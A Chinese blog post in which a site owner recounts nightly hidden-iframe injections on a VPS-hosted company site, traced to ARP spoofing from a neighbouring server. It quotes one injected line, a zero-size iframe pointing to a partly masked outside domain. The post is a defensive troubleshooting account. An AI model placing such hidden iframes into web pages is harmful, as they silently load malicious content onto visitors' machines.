最近很痛苦,网站被挂马,一到晚上22点多,每天准时被挂马,在网站的首部出现这些iframe代码,导致网站在百度和google的排名直线下降,百度降到40多页,google到第四页了。
<iframe src=http://***.92mimi5.cn/***/**.html width=0 height=0></iframe>
一开始不知道什么原因,网站某个时间段打开非常慢,提交服务器管理员工单,也一直找不到原因。后来每天晚上我发现使用谷歌浏览器的时候,出现警告页面,说我网站有恶意软件,我想不可能吧,我怎么会做这个,我只是一个普通的企业站而已。
出现 警告的时候,我上空间查看,我用的是vps,所以管理起来还是很方便。仔细看了,所有的页面虽然被挂入代码,但是在网页里面根本找不到有这个,只是打开网页就会出现。
我以为是网站被人sql注入或者有漏洞,下载了明小子全面查了一遍,结果没有发现问题。找服务器技术,也得不到合理的原因。无奈,只好重新安装过网站程序并升级到最新版,打上补丁,修改空间登录密码,修改数据库名称、用户名、密码,折腾了我两个晚上,原以为就这样会正常,没想到还是有问题。
实在是很痛苦,而我有发现跟我同一个ip段的其中一个vps也出现大量的arp病毒,我思考,会不会是这方面的问题。无意中搜索的时候发现了这篇文章:关于网站挂马Iframe,非常感谢这位博主,我的脑子豁然开朗,连续找了其他几篇相关文章看了:你的网站还好吗?遭遇ARP欺骗,怎么办? 防止ARP地址欺骗,解决网站被挂马的方法 防止i因ARP欺骗网站源文件被注入了iframe代码 ,
然后我在空间安装了360arp防火墙,果然,查处了一堆arp攻击的提醒。
跟服务器技术打电话,让技术去解决,然后再打开网页已经没有iframe代码了。
大功告成!
后记:1、遇到难点的时候一定要仔细去分析原因,这一点服务器的技术真的没有经验,详细如果他们一开始能够从这方面去考虑的话,会早很多时间找到答案。
2、搜索引擎真的是个好东西,一定要好好利用
3、做网站优化一定需要掌握基本的网络安全知识,否则出现的后果会让你非常郁闷!